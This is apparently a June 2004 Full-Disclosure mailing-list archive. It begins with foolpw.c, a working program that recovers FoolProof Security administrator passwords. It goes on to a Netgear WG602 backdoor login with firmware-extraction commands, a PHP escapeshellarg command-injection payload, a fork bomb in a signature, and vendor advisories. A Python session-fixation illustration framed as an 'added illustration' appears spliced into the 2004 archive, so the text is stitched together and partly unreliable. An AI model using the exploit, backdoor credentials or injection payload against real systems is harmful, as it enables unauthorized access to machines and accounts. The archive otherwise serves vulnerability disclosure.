/* foolpw.c
   Copyright (C) 2004 Cyrillium Security Solutions and Services.

   Demonstrates a weakness in FoolProof Security password recovery
   system. See CYSA-0329 for details.

   CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY
   WARRANTY FOR THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING,
   BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
   FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY
   AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE
   DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR
   CORRECTION.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
  int i;                        /* Index variable */
  char a,                       /* Temporary variable for calculations */
       k[33],                   /* Recovery key in hexadecimal */
       k_array[17],             /* Recovery key as array */
       c[17],                   /* Control password */
       *b = "D:SKFOIJ@(*EHJFL", /* Offsets */
       hex_temp[3],             /* Two hexadecimal digits plus terminating NUL */
       *endptr;                 /* Output variable for strtoul */

  if (argc != 3)
  {
    puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
    return 1;
  }

  if (strlen (argv[1]) != 16*2)
  {
    puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
    return 1;
  }

  if (strlen (argv[2]) > 16)
  {
    puts ("Passwords are limited to 16 characters");
    return 1;
  }

  /* Clear each buffer by its own size (the original used sizeof (b),
     which is the size of a pointer, not of the arrays). */
  memset (k, 0, sizeof (k));
  memset (k_array, 0, sizeof (k_array));
  memset (c, 0, sizeof (c));
  memset (hex_temp, 0, sizeof (hex_temp));
  strcpy (k, argv[1]);
  strcpy (c, argv[2]);

  for (i = 0; i < 16; i++)
  {
    /* hex_temp[2] stays '\0', so strtoul reads exactly two digits */
    memcpy (hex_temp, &k[i*2], 2);
    k_array[i] = strtoul (hex_temp, &endptr, 16);
    if (*endptr != '\0')
    {
      printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
      return 1;
    }

    /* A = (C + B) xor K, one byte at a time */
    a = (c[i] + b[i]) ^ k_array[i];
    putc (a, stdout);
  }

  puts ("");
  return 0;
}

5. Solution

Users who know the "Administrator" password can enter the FoolProof control panel and bypass Bootlock/Keylock on any computer that has the same "Administrator" password as the compromised computer. To change the "Administrator" password, FoolProof Security must be reinstalled.

Upgrading to FoolProof Security 4.0 or higher is recommended because the password recovery feature has been removed. However, FoolProof versions 4.0 and higher do not support Windows 95, Windows 98, or Windows Me.

Remember to read the uninstallation and upgrade instructions before upgrading FoolProof Security, especially if you are using Bootlock/Keylock. Improper uninstallation or upgrading could cause your computer to fail to boot.

6. References

1. SmartStuff Software:
2. Riverdeep Interactive Learning, Inc.:

7. Copyright

Copyright (C) 2004 Cyrillium Security Solutions and Services. All rights reserved. Permission is granted to redistribute unmodified copies of this advisory.

From insecure at ameritech.net Sat Jun 5 03:54:32 2004
From: insecure at ameritech.net (Jerry Heidtke)
Date: Fri, 04 Jun 2004 19:54:32 -0700
Subject: [Full-Disclosure] another new worm submission
In-Reply-To: <47190000.1086386745@utd49554.utdallas.edu>
References: <5E1F351F4AE1D611A7FE00B0D0AB064A023532AB@is6b> <40C0E1A9.5080705@ameritech.net> <47190000.1086386745@utd49554.utdallas.edu>
Message-ID: <40C135E8.9030700@ameritech.net>

Paul Schmehl wrote:

> --On Friday, June 04, 2004 03:55:05 PM -0500 insecure
> wrote:
>
>>
>> McAfee 7.1.0 with DAT 4364 (6/2/04) detects it as BackDoor-CCT. This is
>> not a worm, it's a trojan. Your systems are being remotely compromised,
>> possibly with an auto-rooter targeting the lsass vulnerability, which
>> instructs the compromised system to download, install, and run this
>> trojan. This trojan includes a keystroke logger, and additional
>> components that you seem to have missed. Assume that system and any web
>> site passwords have been compromised. Warn the users of these systems
>> that unless they change any financial site passwords they are likely to
>> be victims of theft.
>>
>> How are these system getting compromised? Why don't you have this patch
>> deployed yet? Why are these systems reachable from the Internet over
>> port
>> 445?
>>
> For someone who knows nothing about his network, you sure are willing
> to make a lot of assumptions. You admit you don't know how the systems
> were compromised and you don't know what compromised them, yet you
> castigate him for leaving port 445 open and not patching and you
> assume this happened *remotely*?
>
>> You've got more problems than new worms.
>>
> One of which is miserable comforters.
>
> Paul Schmehl (pauls at utdallas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/ir/security/

You're right, I made an assumption that the systems were being compromised remotely rather than being deliberately and maliciously hacked by insiders. Would this somehow be less of a problem?

Having systems with routable addresses reachable through port 445 is the most likely avenue of compromise; if this is not the case then Josh would be well advised to determine exactly what is going on with his network. He did say there were more than one infected system that were displaying symptoms of attack against lsass, and that he couldn't find AV definitions to pick it up, although it's been detectable as a variant for up to six weeks, and someone else posted detections by 8 different AV packages.

I also stated that there are other components which he didn't find, which was another assumption but one which is proven true by a quick perusal of any AV vendors' write-up on this.

Since the malware he posted doesn't spread automatically and doesn't attack lsass, there is obviously something else going on, which was the point I was trying to make. Apparently I was too obtuse for some people.

I think I suggested some avenues of investigation that may prove helpful to the OP. In what way were your comments helpful?

From aditya.deshmukh at online.gateway.technolabs.net Sat Jun 5 02:16:27 2004
From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh])
Date: Sat, 5 Jun 2004 06:46:27 +0530
Subject: [Full-Disclosure] Using Xbox live for covert communication
In-Reply-To: <9BA6DCC15456CC46894E77233173DD7C157A3905@UCMAIL5>
Message-ID:

>
> Then why not find a friend in germany and pretend to plan a biological
> attack?
> See how "un-monitored" and "private" it is then-:)
>

worth a try for security's sake ? yes!
________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

From fd at proclaimed.net Sat Jun 5 02:32:20 2004
From: fd at proclaimed.net (fd at proclaimed.net)
Date: Fri, 4 Jun 2004 21:32:20 -0400
Subject: [Full-Disclosure] weather.com contact
Message-ID: <000901c44a9c$f6eb8400$547abe18@proclaimed>

Anyone know anyone at weather.com?

From tarundua at linux-delhi.org Sat Jun 5 07:40:49 2004
From: tarundua at linux-delhi.org (tarundua at linux-delhi.org)
Date: Sat, 5 Jun 2004 12:10:49 +0530
Subject: [Full-Disclosure] Re: Here
Message-ID: <200406050633.i556XNv24545@netsys.com>

Your file is attached.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: yours.pif
Type: application/octet-stream
Size: 17920 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040605/0fcd4d05/attachment.obj

From lcamtuf at ghettot.org Sat Jun 5 10:26:23 2004
From: lcamtuf at ghettot.org (Michal Zalewski)
Date: Sat, 5 Jun 2004 11:26:23 +0200 (CEST)
Subject: [Full-Disclosure] weather.com contact
In-Reply-To: <000901c44a9c$f6eb8400$547abe18@proclaimed>
References: <000901c44a9c$f6eb8400$547abe18@proclaimed>
Message-ID: <20040605112540.H75779@dekadens.coredump.cx>

On Fri, 4 Jun 2004 fd at proclaimed.net wrote:

> Anyone know anyone at weather.com?

No, but I must share that I am perhaps for the first time on this list truly scared of what you might have discovered.

A weather control exploit?

--
-------------------------
bash$ :(){ :|:&};: -- Michal Zalewski * [http://lcamtuf.coredump.cx]
Did you know that clones never use mirrors?
---------------------------
2004-06-05 11:25 -- http://lcamtuf.coredump.cx/photo/current/

From chorchert at veedev.de Sat Jun 5 11:51:47 2004
From: chorchert at veedev.de (Christian Horchert)
Date: Sat, 5 Jun 2004 12:51:47 +0200
Subject: [Full-Disclosure] weather.com contact
In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx>
References: <000901c44a9c$f6eb8400$547abe18@proclaimed> <20040605112540.H75779@dekadens.coredump.cx>
Message-ID: <57A8B4C0-B6DE-11D8-8DC0-000393754328@veedev.de>

On 05.06.2004 at 11:26 Michal Zalewski wrote:

> On Fri, 4 Jun 2004 fd at proclaimed.net wrote:
>
>> Anyone know anyone at weather.com?
>
> No, but I must share that I am perhaps for the first time on this list
> truly scared of what you might have discovered.

Some XSS probably.

> A weather control exploit?

While looking out of my office window today, I must admit that I am really looking forward to seeing that one ;-)

Christian

From koon at gentoo.org Sat Jun 5 12:55:48 2004
From: koon at gentoo.org (Thierry Carrez)
Date: Sat, 05 Jun 2004 13:55:48 +0200
Subject: [Full-Disclosure] [ GLSA 200406-03 ] sitecopy: Multiple vulnerabilities in included libneon
Message-ID: <40C1B4C4.30607@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200406-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: sitecopy: Multiple vulnerabilities in included libneon
      Date: June 05, 2004
      Bugs: #51585
        ID: 200406-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

sitecopy includes a vulnerable version of the neon library.

Background
==========

sitecopy easily maintains remote websites. It makes it simple to keep a remote site synchronized with the local site with one command.
Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/sitecopy       <= 0.13.4-r1

Description
===========

Multiple format string vulnerabilities and a heap overflow vulnerability were discovered in the code of the neon library (GLSA 200405-01 and 200405-13). Current versions of the sitecopy package include their own version of this library.

Impact
======

When connected to a malicious WebDAV server, these vulnerabilities could allow execution of arbitrary code with the rights of the user running sitecopy.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

Currently, there is no released version of sitecopy that contains a fix for this issue. The original author of the program has indicated he is unsure when a fixed version may be released. Therefore, the sitecopy package has been hard-masked and current users are advised to unmerge the package until a new version is available.

    # emerge -pv unmerge net-misc/sitecopy
    # emerge unmerge net-misc/sitecopy

References
==========

  [ 1 ] GLSA 200405-01
        http://www.gentoo.org/security/en/glsa/glsa-200405-01.xml
  [ 2 ] GLSA 200405-13
        http://www.gentoo.org/security/en/glsa/glsa-200405-13.xml

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200406-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFAwbTDvcL1obalX08RArrjAJ0S3pVL3yJiDuN1FQ0zjVEXgJVr1ACeMzMT
IfiHxuU2IJ8AzQ09RdZUoTc=
=3VRY
-----END PGP SIGNATURE-----

From fw at deneb.enyo.de Sat Jun 5 17:20:10 2004
From: fw at deneb.enyo.de (Florian Weimer)
Date: Sat, 05 Jun 2004 18:20:10 +0200
Subject: [Full-Disclosure] IBM Potential Credential Impersonation Attack paper?
In-Reply-To: (erwinp21@hotmail.com's message of "Wed, 02 Jun 2004 11:42:22 +0000")
References:
Message-ID: <87zn7iugcl.fsf@deneb.enyo.de>

> I found the following IBM advisory via their outside advisory service:
> http://www-1.ibm.com/support/docview.wss?uid=swg21168762
>
> They refer to an externally available paper that identifies a form of
> credential impersonation exploit that can affect multiple IBM
> products. Does anybody know which paper IBM is referring to? I tried
> google, but I couldn't find anything.

It looks like a session fixation vulnerability (if this is the right terminology):

| Internal Defect: 45186
|
| Symptom: When a user logs in using forms authentication, they receive
| a cookie and a login page. The user logs in and obtains a
| credential. A security vulnerability exists where an attacker could
| send his unauthenticated cookie to person X. If person X logged in
| using this cookie, the attacker could hijack the session of person X

--
Current mail filters: many dial-up/DSL/cable modem hosts, and the following domains: bigpond.com, di-ve.com, fuorissimo.com, hotmail.com, jumpy.it, libero.it, netscape.net, postino.it, simplesnet.pt, spymac.com, tiscali.co.uk, tiscali.cz, tiscali.it, voila.fr, yahoo.com.
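The defect quoted above is the textbook session fixation pattern. As an added illustration (not IBM's code, and not from anyone in this thread), a toy Python session store replays the symptom and shows the standard fix: the pre-authentication session identifier is retired and a fresh one is issued only after the login succeeds. The user name, password and session table are constructed for the demo.

```python
"""Session fixation, as in the quoted IBM defect, and the standard fix.

Constructed toy model (not IBM's code): a server keeps a table of sessions
keyed by the cookie value the client presents. The vulnerable login keeps
whatever session id the client arrived with, so an id the attacker obtained
unauthenticated and planted on the victim becomes the victim's authenticated
session while the attacker still holds it. The fixed login discards the
pre-authentication id and mints a new one after the password checks out.
"""
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed credential store for the demo.
USERS = {"alice": "correct horse"}


@dataclass
class Session:
    user: Optional[str] = None  # None until a login succeeds


@dataclass
class Server:
    sessions: Dict[str, Session] = field(default_factory=dict)

    def new_session(self) -> str:
        """Issue an unauthenticated session (the cookie sent with the login page)."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session()
        return sid

    def login_vulnerable(self, presented_sid: str, user: str, password: str) -> Optional[str]:
        """Pre-fix behaviour: the presented cookie is kept (and created if unknown)."""
        if USERS.get(user) != password:
            return None
        self.sessions.setdefault(presented_sid, Session()).user = user
        return presented_sid

    def login_fixed(self, presented_sid: str, user: str, password: str) -> Optional[str]:
        """Fix: never upgrade a pre-auth id; mint a new id after authentication."""
        if USERS.get(user) != password:
            return None
        self.sessions.pop(presented_sid, None)  # the planted/unauthenticated id dies here
        sid = self.new_session()
        self.sessions[sid].user = user
        return sid

    def whoami(self, sid: Optional[str]) -> Optional[str]:
        """Which user a cookie value authenticates as (None if nobody)."""
        session = self.sessions.get(sid) if sid else None
        return session.user if session else None


def run_scenario(fixed: bool) -> Tuple[Optional[str], Optional[str]]:
    """Replay the defect's symptom; return (attacker cookie user, victim cookie user).

    1. The attacker requests the login page and receives an unauthenticated cookie.
    2. The attacker gets person X (alice) to present that same cookie value.
    3. Alice logs in with it.
    With the vulnerable login the attacker's cookie now authenticates as alice;
    with the fix it authenticates as nobody.
    """
    srv = Server()
    attacker_sid = srv.new_session()
    planted_cookie = attacker_sid
    login = srv.login_fixed if fixed else srv.login_vulnerable
    victim_cookie = login(planted_cookie, "alice", "correct horse")
    return srv.whoami(attacker_sid), srv.whoami(victim_cookie)


if __name__ == "__main__":
    print("vulnerable:", run_scenario(fixed=False))  # ('alice', 'alice')
    print("fixed:     ", run_scenario(fixed=True))   # (None, 'alice')
```

The same check belongs in any real framework: regenerate the session id on privilege change and refuse to adopt identifiers the server never issued.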
From lupe at lupe-christoph.de Thu Jun 3 23:03:13 2004
From: lupe at lupe-christoph.de (Lupe Christoph)
Date: Fri, 4 Jun 2004 00:03:13 +0200
Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability
In-Reply-To:
References:
Message-ID: <20040605181304.14539.qmail@mail.datacolo.com>

On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote:

> Possibly vulnerable (not verified)
> WG602 with other Firmware Versions
> WG602v2

The WG602v2 uses different firmware.

> Download the WG602 Version 1.5.67 firmware from Netgear
> ( http://kbserver.netgear.com/support_details.asp?dnldID=366 )

WG602v2 Firmware Version 2.0RC5:
http://kbserver.netgear.com/support_details.asp?dnldID=504

WG602v2 Repeater Firmware Version 3.2 RC6
http://kbserver.netgear.com/support_details.asp?dnldID=692

> and run the following shell commands on a UNIX box:
> $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz
> $ zcat rd.img.gz | strings | grep -A5 -B5 5777364

2.0RC5
dd if=apfirmware_2.0rc5.img bs=1 skip=111596 of=rd.img.bz2

3.2 RC6
unzip wg602_v2_apfirmware_3.2rc6.zip
dd if=apfirmware_3.2rc6.img bs=1 skip=112620 of=rd.img.bz2

In both cases this:
bzcat rd.img.bz2 | strings | egrep 'Authorization|BASIC|super|5777364'

Returns some garbage, but nothing similar to your output.

Also logging in with super/5777364 does not work with my unit (unknown firmware release - I forgot the password and have to reset the unit. But it's getting a little late here.)

HTH,
Lupe Christoph
--
| lupe at lupe-christoph.de | http://www.lupe-christoph.de/ |
| "... putting a mail server on the Internet without filtering is like |
| covering yourself with barbecue sauce and breaking into the Charity |
| Home for Badgers with Rabies.
Michael Lucas |

From debian-security-announce at lists.debian.org Sat Jun 5 21:39:22 2004
From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org)
Date: Sat, 5 Jun 2004 13:39:22 -0700
Subject: [Full-Disclosure] [SECURITY] [DSA 515-1] New lha packages fix several vulnerabilities
Message-ID: <20040605203922.GW19402@alcor.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 515-1                     security at debian.org
http://www.debian.org/security/                             Matt Zimmerman
June 5th, 2004                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : lha
Vulnerability  : several
Problem-Type   : local
Debian-specific: no
CVE Ids        : CAN-2004-0234 CAN-2004-0235

Two vulnerabilities were discovered in lha:

 - CAN-2004-0234 - Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14 allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive.

 - CAN-2004-0235 - Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path").

For the current stable distribution (woody), these problems have been fixed in version 1.14i-2woody1.

For the unstable distribution (sid), these problems have been fixed in version 1.14i-8.

We recommend that you update your lha package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1.dsc
    Size/MD5 checksum:      556 22b59156de011ddb84b0eaed4f174d2c
  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1.diff.gz
    Size/MD5 checksum:    21414 0f990fd920ea4770dd088a97c1c87f18
  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i.orig.tar.gz
    Size/MD5 checksum:    64196 10410742b0169f3357ef9a3f0f032037

Alpha architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_alpha.deb
    Size/MD5 checksum:    64820 b7e55241026435e0c882178f6606f33b

ARM architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_arm.deb
    Size/MD5 checksum:    55542 62be18e035d6faedb4d990f16081d74e

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_i386.deb
    Size/MD5 checksum:    50090 7548e83cb7049fe43243f804eb456ed7

Intel IA-64 architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_ia64.deb
    Size/MD5 checksum:    73588 32e62b8fbd0cf2ef64d7838d005ef19e

Motorola 680x0 architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_m68k.deb
    Size/MD5 checksum:    48632 bd5ce2c34a44952abf757993153fe238

PowerPC architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_powerpc.deb
    Size/MD5 checksum:    55160 9d8225135b7c6abe443a4d0d4fc27245

IBM S/390 architecture:

  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_s390.deb
    Size/MD5 checksum:    53930 02c5e52b834539a30bd76f2e90265fb8

Sun Sparc architecture:
  http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_sparc.deb
    Size/MD5 checksum:    56526 8323a0469ef41c7fcf8b84c4b5f1a7ce

These files will probably be moved into the stable distribution on its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAwi9kArxCt0PiXR4RAtG3AKCtP0m2hbcPCG2y1hPXPYA2iLTkyACg0g15
BkEdgvrmYOhmBy2sbOzYIoc=
=v4b1
-----END PGP SIGNATURE-----

From dufresne at winternet.com Sat Jun 5 23:38:11 2004
From: dufresne at winternet.com (Ron DuFresne)
Date: Sat, 5 Jun 2004 17:38:11 -0500 (CDT)
Subject: [Full-Disclosure] another new worm submission
In-Reply-To: <40C135E8.9030700@ameritech.net>
Message-ID:

[SNIP]

> >>
> >> How are these systems getting compromised? Why don't you have this patch
> >> deployed yet? Why are these systems reachable from the Internet over
> >> port
> >> 445?
> >>
> > For someone who knows nothing about his network, you sure are willing
> > to make a lot of assumptions. You admit you don't know how the systems
> > were compromised and you don't know what compromised them, yet you
> > castigate him for leaving port 445 open and not patching and you
> > assume this happened *remotely*?
> >>

[SNIP]

> You're right, I made an assumption that the systems were being
> compromised remotely rather than being deliberately and maliciously
> hacked by insiders. Would this somehow be less of a problem? Having
> systems with routable addresses reachable through port 445 is the most
> likely avenue of compromise, if this is not the case then Josh would be
> well advised to determine exactly what is going on with his network.
>

Agreed here, anyone sitting with exposed windows specific ports on the insecure Internet is pretty much deserving of what hits them these days. Without tackling that side of the coin, it's going to be pretty hard for these folks to determine if the troubles they are facing are internal or not. Without control of the perimeter choke point, how can one even think to start to look at controls of the whole danged wire inside?

Perhaps we need to adapt personal firewall day to a monthly thing for the next 5 years or more to help these clueless souls.

[SNIP]

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From dufresne at winternet.com Sat Jun 5 23:41:20 2004
From: dufresne at winternet.com (Ron DuFresne)
Date: Sat, 5 Jun 2004 17:41:20 -0500 (CDT)
Subject: [Full-Disclosure] weather.com contact
In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx>
Message-ID:

On Sat, 5 Jun 2004, Michal Zalewski wrote:

> On Fri, 4 Jun 2004 fd at proclaimed.net wrote:
>
> > Anyone know anyone at weather.com?
>
> No, but I must share that I am perhaps for the first time on this list
> truly scared of what you might have discovered.
>
> A weather control exploit?
>

didn't they try this back at woodstock?

Thanks,

Ron DuFresne
From user86 at earthlink.net Sun Jun 6 01:37:10 2004
From: user86 at earthlink.net (user86)
Date: Sat, 5 Jun 2004 20:37:10 -0400
Subject: [Full-Disclosure] SMC 7008ABRv2 and 7004VBRv1 updated firmware corrects port 1900 issue.
Message-ID: <200406052037.10519.user86@earthlink.net>

SMC has released updated firmware for their 7008ABRv2 (part number: 750.9814) and 7004VBRv1 routers that permanently fixes the port 1900 issue, so that port 1900 is no longer WAN (internet) accessible.

The firmware update for the 7008ABRv2 (version 1.035) is available from:
http://www.smc.com/index.cfm?sec=Support&pg=Download-Details&prod=243&site=c

The firmware update for the 7004VBRv1 (version 1.232) is available from:
http://www.smc.com/index.cfm?sec=Support&pg=Download-Details&prod=257&site=c

From cfaigle at richmond.edu Thu Jun 3 21:18:07 2004
From: cfaigle at richmond.edu (Faigle, Chris)
Date: Thu, 3 Jun 2004 16:18:07 -0400
Subject: [Full-Disclosure] VirusLogger - Script to sort and e-mail Symantec Corporate Anti-Virus Logs available
Message-ID: <0F98C8BA43C00C42AFFBE000DA9DDB2301C49654@pollux.richmond.edu>

Hi,

We use Symantec Corporate Anti-Virus here at the University of Richmond for all faculty, staff and student Windows machines. Several institutions have expressed interest in a script that I wrote to have the logs from the virus server sorted and e-mailed daily. It is now available (under GPL) at http://is.richmond.edu/techsupport/security/Downloads.htm

In brief: It uses Symantec's VHistExp tool (on the CD, in the Tools\Nosuprt\VHistExp\ folder) to pull the logs. It then buckets each entry into "Left Alone", "Deleted", "Cleaned", "Quarantined" and "Unknown". It also makes a bucket for "Special" entries, which are keywords set to "Blaster", "Welchia", "Gaobot", "Sasser", etc. [I use these as an additional resource to determine if a machine is patched.] It then saves these reports and e-mails them to the addresses specified.
I have it set up as a Scheduled Task on our SAV server to run at 3 am, using "VirusLogger.py -yesterday", so every morning I receive a fresh report of the previous day's activity. (As does our help-desk.) Each morning, I go through the "Left Alone" report and use the server to verify if each virus still exists and make decisions as to how each machine should be handled. I go through the "Special" report if it is not empty as these machines have a patch issue. Further, I also quickly check the "Deleted" report to keep an eye on what is coming through, but getting deleted.

It requires Python, keeps an extensive log and has reasonably good exception handling. It has been running stably for months now.

Hope this is useful. Please reply off-list.

Best,

Chris Faigle
IS Security
University of Richmond

From jhg at athensgroup.com Sun Jun 6 01:27:07 2004
From: jhg at athensgroup.com (James Garrison)
Date: Sat, 05 Jun 2004 19:27:07 -0500
Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability
In-Reply-To: <20040603220313.GB2307@lupe-christoph.de>
References: <20040603220313.GB2307@lupe-christoph.de>
Message-ID: <40C264DB.5000302@athensgroup.com>

My WG602v2 with firmware 2.0RC5 does not appear to be vulnerable.

I cannot login with the super/5777364 combination.

Lupe Christoph wrote:
> On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote:
>
>> Possibly vulnerable (not verified)
>> WG602 with other Firmware Versions
>> WG602v2

--
James Garrison                                    Athens Group, Inc.
mailto:jhg at athensgroup.com                           5608 Parkcrest Dr
http://www.athensgroup.com                           Austin, TX 78731
PGP: RSA=0x92E90A3B DH/DSS=0x498D331C                 (512) 345-0600 x150

From jhg at athensgroup.com Sun Jun 6 01:34:32 2004
From: jhg at athensgroup.com (James Garrison)
Date: Sat, 05 Jun 2004 19:34:32 -0500
Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability
In-Reply-To: <20040603220313.GB2307@lupe-christoph.de>
References: <20040603220313.GB2307@lupe-christoph.de>
Message-ID: <40C26698.4090508@athensgroup.com>

CORRECTION - Firmware is 3.1RC5 not 2.0RC5 as I first stated

My WG602v2 with firmware 3.1RC5 does not appear to be vulnerable.
                         ^^^^^^

I cannot login with the super/5777364 combination.

Lupe Christoph wrote:
> On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote:
>
>> Possibly vulnerable (not verified)
>> WG602 with other Firmware Versions
>> WG602v2

--
James Garrison                                    Athens Group, Inc.

From list at fabiand.net Sun Jun 6 12:25:30 2004
From: list at fabiand.net (Daniel Fabian)
Date: Sun, 6 Jun 2004 13:25:30 +0200
Subject: [Full-Disclosure] PHP escapeshellarg Windows Vulnerability
Message-ID: <200406061325.AA2588018034@fabiand.net>

SEC-CONSULT Security Advisory - PHP: Hypertext Preprocessor

Vendor: PHP (http://www.php.net)
Product: PHP 4.3.6 and below (verified in 4.3.5 which was current when the bug was discovered)
Vendor status: vendor contacted (04-04-2004)
Patch status: Problem fixed in 4.3.7

===========
DESCRIPTION
===========

PHP offers the function escapeshellarg() to escape arguments to shell commands in a way that makes it impossible for an attacker to execute additional commands. However, due to a bug in the function, this does not work with the Windows version of PHP.
The following code, for example, is vulnerable:

[code]
$user = escapeshellarg($_GET['user']);
$pwd = escapeshellarg($_GET['pwd']);
system("htpasswd -nb $user $pwd", $return);
[/code]

If an attacker enters '" || dir || ' (without the single quotes) for user (or pwd), the command dir is executed.

===============
GENERAL REMARKS
===============

- The bug was successfully verified in PHP 4.3.3 and 4.3.5. In the former version (4.3.3) the execution of additional commands was only possible when single quotes were used.

- While correcting the vulnerability, the PHP staff seems to have noticed that the function escapeshellcmd is vulnerable too (according to the changelog of v4.3.7).

====================
Recommended Hotfixes
====================

Update PHP to version 4.3.7.

EOF Daniel Fabian / @2004
d.fabian at sec-consult dot com

=======
Contact
=======

SEC CONSULT Unternehmensberatung GmbH
Büro Wien
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
http://www.sec-consult.com

From Jan-Peter.Koopmann at seceidos.de Sun Jun 6 07:59:13 2004
From: Jan-Peter.Koopmann at seceidos.de (Jan-Peter Koopmann)
Date: Sun, 6 Jun 2004 08:59:13 +0200
Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability
Message-ID:

On Sunday, June 06, 2004 2:35 AM James Garrison wrote:

> CORRECTION - Firmware is 3.1RC5 not 2.0RC5 as I first stated
>
> My WG602v2 with firmware 3.1RC5 does not appear to be vulnerable.
>                          ^^^^^^
>
> I cannot login with the super/5777364 combination.

Firmware 3.2RC3 seems safe as well.

Regards,
JP

From mwilliamson at stx.rr.com Sun Jun 6 15:33:00 2004
From: mwilliamson at stx.rr.com (michael s williamson)
Date: Sun, 06 Jun 2004 09:33:00 -0500
Subject: [Full-Disclosure] Using Xbox live for covert communication
In-Reply-To:
References:
Message-ID: <1086532380.21450.15.camel@mesquite.yi.org>

-- snip --
> worth a try for security's sake ? yes!
-- snip --

